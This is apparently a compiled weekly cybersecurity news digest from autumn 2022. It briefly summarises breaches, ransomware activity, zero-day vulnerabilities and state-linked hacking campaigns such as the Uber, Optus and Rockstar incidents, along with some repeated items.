    Last week, “Microsoft shared mitigations for two new Microsoft Exchange zero-day vulnerabilities tracked as CVE-2022-41040 and CVE-2022-41082, but researchers warn that the mitigation for on-premise servers is far from enough. Threat actors are already chaining both of these zero-day bugs in active attacks to breach Microsoft Exchange servers and achieve remote code execution in limited attacks. Both security flaws were reported privately through the Zero Day Initiative program about three weeks ago by Vietnamese cybersecurity company GTSC, who shared the details publicly last week.

    Fired Admin Cripples Former Employer’s Network Using Old Credentials

    After being laid off, an IT system administrator disrupted the operations of his former employer, a high-profile financial company in Hawaii, hoping to get his job back. Casey K. Umetsu, aged 40, worked as a network admin for the company between 2017 and 2019, when his employer terminated his contract. The U.S. Department of Justice says in a press release that the defendant pled guilty yesterday to accessing his former employer's website and making configuration changes to redirect web and email traffic to external computers, "After using his former employer's credentials to access the company's configuration settings on that website, Umetsu made numerous changes, including purposefully misdirecting web and email traffic to computers unaffiliated with the company, thereby incapacitating the company's web presence and email" - the U.S. Department of Justice.

    Hacking Group Hides Backdoor Malware Inside Windows Logo Image

    Security researchers have discovered a malicious campaign by the 'Witchetty' hacking group, which uses steganography to hide a backdoor malware in a Windows logo. Witchetty is closely tied to the state-backed Chinese threat actor APT10 (aka 'Cicada'). The group is also considered part of the TA410 operatives, previously linked to attacks against U.S. energy providers.

    Microsoft: Lazarus Hackers are Weaponizing Open-source Software

    Microsoft says the North Korean-sponsored Lazarus threat group is trojanizing legitimate open-source software and using it to backdoor organizations in many industry sectors, such as technology, defense, and media entertainment. The list of open-source software weaponized by Lazarus state hackers to deploy the BLINDINGCAN (aka ZetaNile) backdoor includes PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and the muPDF/Subliminal Recording software installer.

    Hacker Shares How They Allegedly Breached Fast Company’s Site

    We shared this week that the Fast Company took its website offline after it was hacked to display stories and push out Apple News notifications containing obscene and racist comments. Today, the hacker shared how they allegedly breached the site. The site today shows a statement from the company confirming they were hacked on Sunday afternoon, followed by an additional hack on Tuesday evening that allowed threat actors to push out racist notifications to mobile devices via Apple News.

    New Malware Backdoors VMware ESXi Servers to Hijack Virtual Machines

    In an incident response engagement earlier this year, security researchers at cyber threat intelligence company Mandiant (acquired by Google) found that an actor suspected to have ties with China used malicious vSphere Installation Bundles (VIBs) to deliver the VirtualPita and VirtualPie malware. With the help of malicious vSphere Installation Bundles, an attacker could install malware on bare-metal hypervisors. Researchers have named the two backdoors VirtualPita and VirtualPie. Also uncovered was a unique malware sample dubbed VirtualGate, which includes a dropper and a payload.

    Hackers now sharing cracked Brute Ratel post-exploitation kit online

    The Brute Ratel post-exploitation toolkit has been cracked and is now being shared for free across Russian-speaking and English-speaking hacking communities. For those unfamiliar with Brute Ratel C4 (BRC4), it is a post-exploitation toolkit created by Chetan Nayak, an ex-red teamer at Mandiant and CrowdStrike. Similar to Cobalt Strike, Brute Ratel is a toolkit used by red teamers to deploy agents, called badgers, on compromised network devices and use them to execute commands remotely and spread further on a network.

    New Chaos malware infects Windows, Linux devices for DDoS attacks

    A quickly expanding botnet called Chaos is targeting and infecting Windows and Linux devices to use them for cryptomining and launching DDoS attacks. This Go-based malware can also infect various architectures, including x86, x86-64, AMD64, MIPS, MIPS64, ARMv5-ARMv8, AArch64, and PowerPC, used by a wide range of devices from small office/home office routers and enterprise servers. Even though it mainly propagates by attacking devices unpatched against various security vulnerabilities and SSH brute-forcing, Chaos will also use stolen SSH keys to hijack more devices. It also backdoors hijacked devices by establishing a reverse shell that will allow the attackers to reconnect at any time for further exploitation.

    What Telcos Should Learn from the Optus Breach

    The second-largest telecommunications provider in Australia – Optus – was recently breached and faced a $1m extortion threat. Making matters worse, the attacker started contacting Optus customers directly. According to reports in the Australian media, the hacker has texted customers demanding $2000 AUD to be paid within two days, or their personal identifiable information (PII) will be sold for fraudulent purposes. However, this is an ongoing story, and the hacker has now apparently taken down the database containing customers’ released information and apologized for their actions. It may be that the attacker got more attention than they bargained for.

    Hacker Breaches Fast Company Systems to Send Offensive Apple News Notifications

    Fast, who is a U.S. business publication company has confirmed that a hacker breached its internal systems to send offensive push notifications to Apple News users. In a statement, Fast Company said that a threat actor breached the company’s content management system (CMS) on Tuesday, giving them access to the publication’s Apple News account. The hacker used this access to send two “obscene and racist” push notifications to Apple News subscribers, prompting shocked users to post screenshots on Twitter. It’s not clear how many users received the notifications before they were deleted, “The messages are vile and are not in line with the content and ethos of Fast Company,” Fast Company said. “We are investigating the situation and have shut down FastCompany.com until the situation has been resolved.

    North Korea-Linked Lazarus Continues to Target Job Seekers With MacOS Malware

    Last week we shared that SentinelOne researchers discovered decoy documents advertising positions for the popular cryptocurrency exchange Crypto[.]com, a continuation of an investigation by ESET back in August. The security company observed the APT group Lazarus targeting job seekers with macOS malware working on Intel and M1 chipsets. As you may recall, ESET published a series of tweets detailing the attacks; the experts spotted a signed Mac executable disguised as a job description for Coinbase. The malicious code was uploaded to VirusTotal from Brazil on August 11, 2022.

    Meta Takes Down Russian "Smash-and-Grab" Disinformation Campaign

    Meta has revealed how it closed down two significant but unconnected disinformation operations originating in China and Russia, which attempted to influence public opinion in Western countries. The first was the “largest and most complex” Russian campaign seen since the start of the country’s war against Ukraine, according to the social media giant” (Bleeping Computer, 2022). Meta notes that beginning in May, Russian actors coordinated a disinformation campaign against media consumers in Germany, France, Italy, Ukraine, and the UK. It centered on 60 websites designed to spoof legitimate news sites such as The Guardian in the UK and Germany’s Bild and Der Spiegel. The articles criticized Ukraine and Ukrainian refugees, supported Russia, and argued that Western sanctions on Russia would backfire.

    Leaked LockBit 3.0 builder used by ‘Bloody’ ransomware gang in attacks

    The relatively new Bloody Ransomware Gang has started to use a recently leaked LockBit ransomware builder in attacks against companies. Last week, the LockBit 3.0 ransomware builder was leaked on Twitter after the LockBit operator had a falling out with his developer. This builder allows anyone to build a fully functional encryptor and decryptor that threat actors can use for attacks. As the builder includes a configuration file that can easily be customized to use different ransom notes, statistics servers, and features, BleepingComputer predicted that other threat actors would soon use the builder to create their own ransomware.

    Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware

    A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT). "This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past," Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a Tuesday write-up. Sold on the dark web for €189 a month, Quantum Builder is a customizable tool for generating malicious shortcut files as well as HTA, ISO, and PowerShell payloads to deliver next-stage malware on the targeted machines, in this case Agent Tesla.

    Hackers Use PowerPoint Files for 'Mouseover' Malware Delivery

    Researchers from Cluster25 believe APT28, a Russian state sponsored threat group, is using a new code execution technique that relies on mouse movement in Microsoft PowerPoint presentation (T1566.001, T1204.002), which in turn triggers a malicious PowerShell script (T1059.001). While most Microsoft Office based attacks require malicious macros, this new technique does not, making it especially dangerous.

    Ransomware Data Theft Tool May Show a Shift in Extortion Tactics

    A new sample of malware known as Exmatter was spotted by malware analysts with the Cyderes Special Operations team during a recent incident response following a BlackCat ransomware attack and later shared with the Stairwell Threat Research team for further analysis (Symantec saw a similar sample deployed in a Noberus ransomware attack). Exmatter has been used by BlackMatter affiliates since at least October 2021, this is the first time the malicious tool was seen sporting a destructive module.

    New Hacking Group ‘Metador’ Lurking in ISP Networks for Months

    Researchers have named 'Metador' a previously unknown threat actor' which has been breaching telecommunications, internet services providers (ISPs), and universities for about two years. Metador targets organizations in the Middle East and Africa, and its purpose appears to be long-term persistence in espionage. The group uses two Windows-based malware that has been described as "extremely complex," but there are indications of Linux malware, too.

    Microsoft SQL servers hacked in TargetCompany ransomware attacks

    Vulnerable Microsoft SQL servers are being targeted in a new wave of attacks with FARGO ransomware, security researchers are warning. MS-SQL servers are database management systems holding data for internet services and apps. Disrupting them can cause severe business trouble. BleepingComputer has reported similar attacks in February, dropping Cobalt Strike beacons, and in July when threat actors hijacked vulnerable MS-SQL servers to steal bandwidth for proxy services. The latest wave is more catastrophic, aiming for a quick and easy profit by blackmailing database owners.

    Sophos Firewall Zero-Day Exploited in Attacks on South Asian Organizations

    Last Friday, Sophos released security updates to address a critical zero-day vulnerability that is actively being exploited in the wild. Tracked as CVE-2022-3236 (CVSS score: 9.8), the flaw impacts Sophos Firewall v19.0 MR1 and older and is related to a code injection vulnerability in the User Portal and Webadmin of Sophos Firewall. Successful exploitation could enable a malicious threat actor to remotely execute code.

    Hackers Use NullMixer and SEO to Spread Malware More Efficiently

    Researchers from Kaspersky noticed a new malicious campaign using the NullMixer malware tool. The tool is used to spread malware via malicious websites and can easily be found via popular search engines, including Google. “These websites are often related to crack, keygen and activators for downloading software illegally, and while they may pretend to be legitimate software, they actually contain a malware dropper,” reads the advisory.

    Russia-Based Hackers FIN11 Impersonate Zoom to Conduct Phishing Campaigns

    Russian threat actors allegedly from FIN11 have been impersonating web download pages for Zoom, to trick victims into downloading malicious executables. Security company Cyfirma released their findings and issued an advisory this week. FIN11 has been conducting a large-scale phishing campaign which masquerades as Zoom download pages. The goal of the campaign is to infect users with the Vidar information stealing malware.

    Fake Indian Banking Rewards Apps Targeting Android Users with Info-stealing Malware

    An SMS-based phishing campaign is targeting customers of Indian banks with information-stealing malware that masquerades as a rewards application. The Microsoft 365 Defender Research Team said that the messages contain links that redirect users to a sketchy website that triggers the download of the fake banking rewards app for ICICI Bank. According to researchers, the malware is capable of intercepting important device notifications and stealing SMSes, allowing the threat actors to potentially swipe 2FA codes sent as text messages and gain unauthorized access to victim accounts.

    Hackers stealing GitHub accounts using fake CircleCI notifications

    GitHub is warning of an ongoing phishing campaign that started on September 16 and is targeting its users with emails that impersonate the CircleCI continuous integration and delivery platform. The bogus messages inform recipients that the user terms and privacy policy have changed and they need to sign into their GitHub account to accept the modifications and keep using the services. The threat actors' goal is to steal GitHub account credentials and two-factor authentication (2FA) codes by relaying them through reverse proxies.

    Australian Telecoms Company Optus Discloses Security Breach

    Optus, one of the largest service providers in Australia, disclosed a data breach. The intruders gained access to the personal information of both former and current customers. The company is a subsidiary of Singtel with 10.5 million subscribers as of 2019. The company notified the Australian Cyber Security Centre which is helping it to mitigate any risks to customers. Optus has also notified the Australian Federal Police, the Office of the Australian Information Commissioner and key regulators.

    Cisa Warns of Critical Manageengine RCE Bug Used in Attacks

    The Cybersecurity and Infrastructure Security Agency (CISA) has added a critical severity Java deserialization vulnerability affecting multiple Zoho ManageEngine products to its catalog of bugs exploited in the wild. This security flaw (CVE-2022-35405) can be exploited in low-complexity attacks, without requiring user interaction, to gain remote code execution on servers running unpatched Zoho ManageEngine PAM360 and Password Manager Pro (without authentication) or Access Manager Plus (with authentication) software.

    LockBit Ransomware Builder Leaked Online by “Angry Developer”

    LockBit recently suffered a breach, with an allegedly disgruntled developer leaking the bulilder for the gang’s newest encryptor. In June, the LockBit ransomware operation released version 3.0 of their encryptor, codenamed LockBit Black, after testing it for two months. The new version promised to 'Make Ransomware Great Again,' adding new anti-analysis features, a ransomware bug bounty program, and new extortion methods.

    BlackCat Ransomware’s Data Exfiltration Tool Gets an Upgrade

    The BlackCat Ransomware gang (aka ALPHV) recently came out with a new version of its data exfiltration tool used for double-extortion attacks. Dubbed “Exmatter,” the tool was introduced during BlackCat’s launch in November 2021 and was heavily updated in August 2022, featuring the following changes:

    • Limit type of files to exfiltrate to: PDF, DOC, DOCX, XLS, PNG, JPG, JPEG, TXT, BMP, RDP, SQL, MSG, PST, ZIP, RTF, IPT, and DWG.
    • Add FTP as an exfiltration option in addition to SFTP and WebDav.
    • Offer option to build a report listing all processed files
    • Add “Eraser” feature giving the option to corrupt processed files
    • Add “Self-destruct” configuration option to quit and delete itself if executed in non-valid environments.
    • Remove support for Socks5
    • Add option for GPO deployment

      The latest Exmatter version has undergone heavy code refactoring, allowing it to implement its existing features more stealthily to evade detection.

    Domain Shadowing Becoming More Popular Among Cybercriminals

    Researchers from Palo Alto’s Unit 42, have discovered the technique of domain shadowing is more prevalent than originally thought. The company found nearly 12,000 cases of domain shadowing between April and June of 2022. “Domain shadowing is a subcategory of DNS hijacking, where threat actors compromise the DNS of a legitimate domain to host their own subdomains for use in malicious activity but do not modify the legitimate DNS entries that already exist.

    Atlassian Confluence Bug CVE-2022-26134 Exploited in Cryptocurrency Mining Campaign

    In a post published by TrendMicro, threat actors were observed actively leveraging CVE-2022-26134, remote code execution vulnerabilities, which received a critical rating of 9.8 out of 10 on the CVSS scale. TrendMicro also made it worthy of knowing that if the bugs are left unremedied and successfully exploited could be used for additional purposes where an could potentially takeover domains, deploy information stealers, install remote access trojans (RATs), or deploy ransomware.

    Unpatched 15-Year Old Python Bug Allows Code Execution in 350K Projects

    The vulnerability likely affects more than 350,000 open-source repositories and could lead to code execution if exploited by an attacker. CVE-2007-4559 was disclosed in 2007, but the security bugs never received a patch. The only mitigation provided around the time of disclosure was a documentation update warning developers that the vulnerability exists. The bug lies in the Python tarfile package, "in code that uses un-sanitized tarfile.extract() function or the built-in defaults of tarfile.extractall(). A path traversal bug enables an attacker to overwrite arbitrary files.

    Imperva mitigated long-lasting, 25.3 billion request DDoS attack

    Internet security company Imperva has announced its DDoS (distributed denial of service) mitigation solution has broken a new record, defending against a single attack that sent over 25.3 billion requests to one of its customers. The target was a Chinese telecommunications service provider often at the receiving end of DDoS attacks with unusually large volumes. The DDoS attack unfolded on June 27, 2022, peaking at 3.9 million requests per second (RPS) and averaging 1.8 million RPS.

    Hive Ransomware Claims Attack on New York Racing Association

    NYRA is the operator of New York's most extensive thoroughbred horse racing tracks, namely the Aqueduct Racetrack, the Belmont Park, and the Saratoga Racecourse. According to the security breach notifications sent to impacted individuals late last month and shared with the authorities last week, the threat actors may have exfiltrated the following member information from the organization:

    • Social security numbers (SSNs)
    • Driver's license identification numbers
    • Health records
    • Health insurance information

    Okta: Credential Stuffing Accounts for 34% Of All Login Attempts

    Okta reports that the attacks involving credentials stuffing have gotten worse in 2022. The identity and access management firm has recorded over 10 billion credential stuffing events on its platform in the first 90 days of 2022. This number represents roughly 34% of the overall authentication traffic, which means that one-third of all attempts are malicious and fraudulent. Okta notes that recent attacks are using a “burst” approach, where a large number of credentials are used in a short time. Impacted platforms saw sudden load spikes of up to tenfold from previous attacks,” targeting specific geographic locations with the worst cases located Southeast Asia and the United States.

    2K Games Says Hacked Help Desk Targeted Players with Malware

    American video game publisher 2K has confirmed that its help desk platform was hacked and used to target customers with fake support tickets pushing malware via embedded links. 2K released a statement on the incident: "Earlier today, we became aware that an unauthorized third party illegally accessed the credentials of one of our vendors to the help desk platform that 2K uses to provide support to our customers," Using the third-party support system, the threat actor sent communications to certain players which contained a malicious link. 2K is asking customers not to open emails coming from 2K Games support at this time. The malicious link contained a ZIP archive, which if opened contained the RedLine Stealer malware.

    IT Giants Warn of Ongoing Chromeloader Malware Campaigns

    Back in May, Researchers from Red Canary found a malicious Chrome browser extension (T1587.001) that modifies browser settings and redirects user traffic (T1185). “The malware is able to redirect the user’s traffic and hijacking user search queries to popular search engines, including Google, Yahoo, and Bing. The malicious code is also able to use PowerShell (T1059.001) to inject itself into the browser and added the extension to the browser” (Security Affairs, 2022). This week, VMWare and Microsoft confirmed their own sighting of a widespread ChromeLoader Campaign, that is dropping malicious browser extensions, the node-WebKit malware, and ransomware.

    American Airlines Discloses Data Breach After Employee Email Compromise

    American Airlines has notified customers of a recent data breach after attackers compromised an undisclosed number of employee email accounts and gained access to sensitive personal information. In notification letters sent on Friday, September 16th, the airline explained that it has no evidence that the exposed data was misused. American Airlines discovered the breach on July 5th, immediately secured the impacted email accounts, and hired a cybersecurity forensic firm to investigate the security incident.

    Uber Blames Lapsus$ for Breach

    The threat actor responsible for hacking Uber last week is likely connected to the prolific Lapsus$ group, the firm has claimed. The ride-hailing giant admitted last Thursday that it was investigating a security incident after reports revealed a malicious actor claiming to be 18 years old had managed to access email and cloud systems, code repositories, an internal Slack account and HackerOne tickets. In an update yesterday, Uber explained that the attacker targeted an Uber EXT contractor, most likely obtaining their corporate password on the dark web after the credential had been stolen via malware installed on their personal device.

    MFA Fatigue: Hackers’ New Favorite Tactic in High-Profile Breaches

    Attackers are more frequently using social engineering attacks to gain access to corporate credentials and breach large networks. One component of these attacks that is becoming more popular with the rise of multi-factor authentication is a technique called MFA Fatigue. When breaching corporate networks, hackers commonly use stolen employee login credentials to access VPNs and the internal network.

    Russian Sandworm Hackers Pose as Ukrainian Telcos to Drop Malware

    The Russian state-sponsored hacking group known as Sandworm has been masquerading as telecommunication providers to target Ukrainian entities with malware. Starting from August 2022, researchers at Recorded Future have observed a rise in Sandworm command and control (C2) infrastructure that uses dynamic DNS domains masquerading as Ukrainian telecommunication service providers. While Sandworm has refreshed its C2 infrastructure significantly, it did so gradually, so historical data from CERT-UA reports allowed Recorded Future to link current operations with solid confidence to the threat actor.

    Emotet Botnet Now Pushes Quantum and Blackcat Ransomware

    While monitoring the Emotet botnet's current activity, security researchers found that the Quantum and BlackCat ransomware gangs are now using the malware to deploy their payloads. This is an interesting development given that the Conti cybercrime syndicate was the one that previously used the botnet before shutting down in June. The Conti group was the one who orchestrated its comeback in November after an international law enforcement action took down Emotet's infrastructure at the beginning of 2021.

    Hackers Had Access to LastPass's Development Systems for Four Days

    LastPass recently published an updated notice in regard to the security incident that targeted its development environment, resulting in the theft of some of LastPass’s source code and technical information. According to the password management company, the threat actor only had access to LastPass’s systems for a period of four days. During this timeframe, LastPast stated that its security team detected the threat actor’s activity and contained the incident. Although the threat actor was able to access the Development environment, LastPass confirmed that no customer data or encrypted password vaults were accessed.

    New York Ambulance Service Discloses Data Breach After Ransomware Attack

    Empress EMS (Emergency Medical Services), a New York-based emergency response and ambulance service provider, has disclosed a data breach that exposed customer information. According to the notification, the company suffered a ransomware attack on July 14, 2022. An investigation into the incident revealed that the intruder had gained access to Empress EMS’ systems on May 26, 2022. About a month and a half later, on July 13, the hackers exfiltrated “a small subset of files,” a day before deploying the encryption.

    GTA 6 Source Code and Videos Leaked After Rockstar Games Hack

    As of 2022, Rockstar Games net worth is over $5 billion. The wealth has been created from the many games that the company has published. One of the highest-selling games is Grand Theft Auto, popularly known as GTA. Also, this company released several movies that have enjoyed super success. With that being said Grand Theft Auto 6 gameplay videos and source code have been leaked after a hacker allegedly breached Rockstar Game's Slack server and Confluence wiki. The videos and source code were first leaked on GTAForums yesterday, where a threat actor named ‘teapotuberhacker’ shared a link to a RAR archive containing 90 stolen videos.

    NETGEAR Routers Impacted by FunJSQ Game Acceleration Module Flaw

    Researchers at security and compliance assessment firm Onekey warns of an arbitrary code execution via FunJSQ, which is a third-party module developed by Xiamen Xunwang Network Technology for online game acceleration, that impacts multiple Netgear router models. The FunJSQ module is used in various NETGEAR routers and Orbi WiFi systems, the issues affecting it were discovered in May 2022 and are now fixed. The analysis of various firmware allowed the researchers to discover the presence of the flawed module in NETGEAR devices (R9000, R7800, RAX200, RAX120, R6230, R6260, RAX40) and some Orbi WiFi Systems (RBR20, RBS20, RBR50, RBS50).

    Notepad++ Plugins Allow Attackers to Infiltrate Systems, Achieve Persistence

    According to research from Cybereason, threat actors are abusing Notepad++ plugins to bypass security mechanisms and achieve persistence on a victim machine (T1203). Notepad++ is a popular open source coding environment that formats text for various coding languages. The abused plugin packs itself in a .NET package for Visual Studio an provides a basic template for building plugins. An advanced persistent threat (APT) group is leveraging the plugin for malicious purposes.

    Uber Hacked, Internal Systems Breached and Vulnerability Reports Stolen

    Uber suffered a cyberattack Thursday afternoon with a hacker gaining access to vulnerability reports and sharing screenshots of the company's internal systems, email dashboard, and Slack server. The screenshots shared by the hacker and seen by BleepingComputer show what appears to be full access to many critical Uber IT systems, including the company's security software and Windows domain.

    Hive Ransomware Claims Cyberattack on Bell Canada Subsidiary

    The Hive ransomware gang claimed responsibility for an attack that hit the systems of Bell Canada subsidiary Bell Technical Solutions (BTS). BTS is an independent subsidiary with more than 4,500 employees, specializing in installing Bell services for residential and small business customers across the Ontario and Québec provinces. While the Canadian telecommunications company didn't reveal when its network was breached or the attack happened, Hive claims in a new entry added to its data leak blog that it encrypted BTS' systems almost a month ago, on August 20, 2022.

    North Korean Hackers are using Trojanized Versions of the PuTTY SSH Client to Deploy Backdoors

    North Korean hackers are using trojanized versions of the PuTTY SSH client to deploy backdoors on targets' devices as part of a fake Amazon job assessment. A novel element in this campaign is the use of a trojanized version of the PuTTY and KiTTY SSH utility to deploy a backdoor, which in this case, is 'AIRDRY.V2'. The group's latest activities appear to be a continuation of the 'Operation Dream Job' campaign, which has been ongoing since June 2020, this time targeting media companies.

    US Sanctions Iranian Spooks for Albania Cyberattack

    The U.S. government sanctioned Iran's Ministry of Intelligence and Security and its minister for a July cyberattack that temporarily paralyzed Albania's online service portal for citizens. The designation by the Department of Treasury prohibits persons under U.S. jurisdiction from transacting with the ministry and its minister, Esmail Khatib. The action will have no material effect given long-standing and robust governmental prohibitions on doing business with Iran. The Treasury Department already sanctioned the ministry for support of terrorism and human rights abuses, but the designation of Khatib is new.

    Russian Hackers Use New Info Stealer Malware Against Ukrainian Orgs

    Russian hackers have been targeting Ukrainian entities with previously unseen info-stealing malware during a new espionage campaign that is still active. Security researchers at Cisco Talos attribute the campaign to Gamaredon, a Russian state-backed threat group with a long history of targeting mainly organizations in the Ukrainian government, critical infrastructure, defense, security, and law enforcement.

    Researchers Detail OriginLogger RAT — Successor to Agent Tesla Malware

    Palo Alto Networks Unit 42 has detailed the inner workings of a malware called OriginLogger, which has been touted as a successor to the widely used information stealer and remote access trojan (RAT) known as Agent Tesla” (The Hacker News, 2022). Agent Tesla is a .NET based keylogger and remote access tool that allows threat actors to gain remote access to targeted systems and beacon sensitive information to an actor-controlled domain. The malware can be purchased by interested buyers on the dark web and is generally distributed through malicious spam emails as an attachment.

    U.S. Charges 3 Iranian Hackers and Sanctions Several Others Over Ransomware Attacks

    On Wednesday, the U.S. Treasury Department's Office of Foreign Assets Control (OFAC) announced sanctions against ten individuals and two other entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020. The individuals are employees and associates of Iran-based Najee Technology Hooshmand Fater LLC (Najee Technology) and Afkar System Yazd Company (Afkar System)

    Tesla Hack Could Allow Car Theft, Security Researchers Warn

    Security researchers unveiled another potential flaw in the technology used by auto manufacturer Tesla to unlock its cars that makes them vulnerable to theft. Whether because of Tesla's cutting-edge reputation or because techies like driving electric vehicles, Tesla seems to invite probes from white hat hackers eager to publicize how thieves could drive one away. The newest example comes from internet of things security company IOActive, which describes an attack involving two people, a customized RFID emulator and a mark who carries a Tesla near-field communication key card for a Model Y sedan.

    Twitter Former Head of Security Told the Senate of Severe Security Failings by the Company

    Peiter ‘Mudge’ Zatko, former head of security, testified in front of Congress on Tuesday, sustaining that the platform ignored his security concerns and was vulnerable to cyber attacks. Zatko filed a whistleblower complaint in July with Congress, the justice department, the Federal Trade Commission and the Securities and Exchange Commission, arguing that Twitter mislead regulators and the public about its cybersecurity best practices. The expert added that ‘any employee could take over the accounts of any senator in this room.’ While serving as head of security for the company, from late 2020 until January 2022, he repeatedly alerted the management of the presence of severe vulnerabilities that could expose the platform to compromise, “I’m here today because Twitter leadership is misleading the public, lawmakers, regulators and even its own board of directors,” Zatko told the hearing.

    Microsoft Fixes Exploited Zero-Day in the Windows CLFS Driver (CVE-2022-37969)

    Security researchers have noted that attackers are exploiting CVE-2022-37969 in the wild. The CVE references Microsoft Windows CLFS - Common Log File System. To leverage the driver vulnerability, an attacker must have access to targeted systems and the ability to run code on the said system (e.g., by exploiting another vulnerability or through social engineering attempts) before it can be triggered.

    Death of Queen Elizabeth II exploited to steal Microsoft credentials

    Treat actors are exploiting the death of Queen Elizabeth II in phishing attacks to lure their targets to sites that steal their Microsoft account credentials. In addition to Microsoft account details, the attackers also attempt to steal their victims' multi-factor authentication (MFA) codes to take over their accounts, "Messages purported to be from Microsoft and invited recipients to an 'artificial technology hub' in her honor.”

    Zero-day in WPGateway WordPress Plugin Actively Exploited in Attacks

    The Wordfence Threat Intelligence team warned yesterday that WordPress sites are actively targeted with exploits targeting a zero-day vulnerability in the WPGateway premium plugin. WPGateway is a WordPress plugin that allows admins to simplify various tasks, including setting up and backing up sites and managing themes and plugins from a central dashboard

    Microsoft September 2022 Patch Tuesday Fixes Zero-Day Used in Attacks, 63 Flaws

    As part of the September 2022 Patch Tuesday, Microsoft addressed 63 vulnerabilities including a zero-day that is actively being exploited in the wild. Of the 63 flaws, there were 18 Elevation of Privilege Vulnerabilities, 1 Security Feature Bypass Vulnerabilities, 30 Remote Code Execution Vulnerabilities, 7 Information Disclosure Vulnerabilities, and 7 Denial of Service Vulnerabilities. 5 of the 63 flaws have been rated critical in severity, all of which allow for remote code execution.

    Zero-day in WPGateway WordPress Plugin Actively Exploited in Attacks

    The Wordfence Threat Intelligence team warned yesterday that WordPress sites are actively targeted with exploits targeting a zero-day vulnerability in the WPGateway premium plugin. WPGateway is a WordPress plugin that allows admins to simplify various tasks, including setting up and backing up sites and managing themes and plugins from a central dashboard

    Microsoft September 2022 Patch Tuesday Fixes Zero-Day Used in Attacks, 63 Flaws

    As part of the September 2022 Patch Tuesday, Microsoft addressed 63 vulnerabilities including a zero-day that is actively being exploited in the wild. Of the 63 flaws, there were 18 Elevation of Privilege Vulnerabilities, 1 Security Feature Bypass Vulnerabilities, 30 Remote Code Execution Vulnerabilities, 7 Information Disclosure Vulnerabilities, and 7 Denial of Service Vulnerabilities. 5 of the 63 flaws have been rated critical in severity, all of which allow for remote code execution.

    Chinese Hackers Create Linux Version of the SideWalk Windows Malware

    State-backed Chinese hackers have developed a Linux variant for the SideWalk backdoor used against Windows systems belonging to targets in the academic sector. The malware is attributed with high confidence to the SparklingGoblin threat group, also tracked as Earth Baku, which is believed to be connected to the APT41 cyberespionage group.

    Apple Releases iOS and macOS Updates to Patch Actively Exploited Zero-Day Flaw

    Yesterday, Apple released security updates to address multiple vulnerabilities in iOS, macOS, and iPadOS, including a new zero flaw that has been used in attacks in the wild. The zero-day which is being tracked as CVE-2022-32917 resides in the kernel and could enable a malicious application to execute arbitrary code with kernel-level privileges. Although the technical details of CVE-2022-32917 have yet to be released, Apple stated in its advisory that the bug has been resolved with improved bound checks.

    Lorenz Ransomware Breaches Corporate Network via Phone Systems

    The Lorenz ransomware gang now uses a critical vulnerability in Mitel MiVoice VOIP appliances to breach enterprises, using their phone systems for initial access to their corporate networks. Arctic Wolf Labs security researchers spotted this new tactic after observing a significant overlap with Tactics, Techniques, and Procedures (TTPs) tied to ransomware attacks exploiting the CVE-2022-29499 bug for initial access, as Crowdstrike reported in June. While these incidents weren't linked to a specific ransomware gang, Arctic Wolf Labs was able to attribute similar malicious activity to the Lorenz gang with high confidence.

    The U.S. Army Prepares for a 40 Drone Swarm Attack

    On the morning of September 11, 2022, the U.S. Army launched a swarm of 40 s small quadcopter drones into the California desert as part of a training exercise designed to prepare America’s soldiers for a grim reality of modern war: cheap off the shelf drones capable of carrying munitions have become ubiquitous on the battlefield. As first spotted by The Warzone, the drone swarm is part of a training exercise. “MILES, and lethal munition capable” sounds ominous but references what the drone is capable of doing and the equipment it’s been equipped with. MILES is the Multiple Integrated Laser Engagement System, a kind of fancy laser tag that tracks kills and casualties.

    Iranian Attackers Upgrade Social Engineering Tactics

    Iranian threat actor TA453 has been sending spear-phishing emails to individuals specializing in Middle Eastern affairs, nuclear security and genome research with a social engineering twist: As opposed to a one-on-one conversation, the known actor has been including multiple fake personas on the email chain in hopes of making the attack appear more legitimate. Researchers said that the technique, which has been previously used by business email compromise (BEC) group Cosmic Lynx, is “intriguing” because attackers must leverage more resources and email addresses.

    New PsExec Spinoff Lets Hackers Bypass Network Security Defenses

    Security researchers have developed an implementation of the Sysinternals PsExec utility that allows moving laterally in a network using a single, less monitored port, Windows TCP port 135. PsExec is a legitimate tool that helps administrators execute processes remotely on machines in the network without having to install a client. Threat actors have abused the tool for post-exploitation stages of an attack, using it to spread on the network, run commands on multiple systems, and deploy malware.

    Cisco Confirms Yanluowang Ransomware Leaked Stolen Company Data

    Cisco has confirmed that the data leaked yesterday by the Yanluowang ransomware gang was stolen from the company network during a cyberattack in May. However, the company says in an update that the leak does not change the initial assessment that the incident has no impact on the business: “On September 11, 2022, the bad actors who previously published a list of file names from this security incident to the dark web, posted the actual contents of the same files to the same location on the dark web. The content of these files match what we already identified and disclosed. Our previous analysis of this incident remains unchanged-we continue to see no impact to our business, including Cisco products or services, sensitive customer data or sensitive employee information, intellectual property, or supply chain operations.”

    Cops Raid Suspected Fraudster Penthouses

    Investigators have disrupted a major organized crime gang believed to have tricked thousands of British victims into handing over money. The UK’s National Crime Agency (NCA) and Romanian police searched two penthouse apartments in Bucharest thought to have been the nerve center for a fraud operation that targeted consumers across Europe on a “massive scale.

    Ransomware Actors Embrace Intermittent Encryption

    Threat actors are increasingly turning to a new encryption method in their ransomware attacks, designed to improve success rates, according to SentinelOne. SentinelLabs researchers Aleksandar Milenkoski and Jim Walter wrote in a new blog post that “intermittent encryption” is being heavily advertised to buyers and affiliates. Compared to traditional ransomware methods, this new encryption method offers higher speeds, and a better ability to evade threat detection tools. By only partially encrypting the victim’s files, threat actors can cause damage more quickly. The intermittent encryption will also trick statistical analysis that is commonly used by security tools to detect ransomware.

    U.S. Imposes New Sanctions on Iran Over Cyberattack on Albania

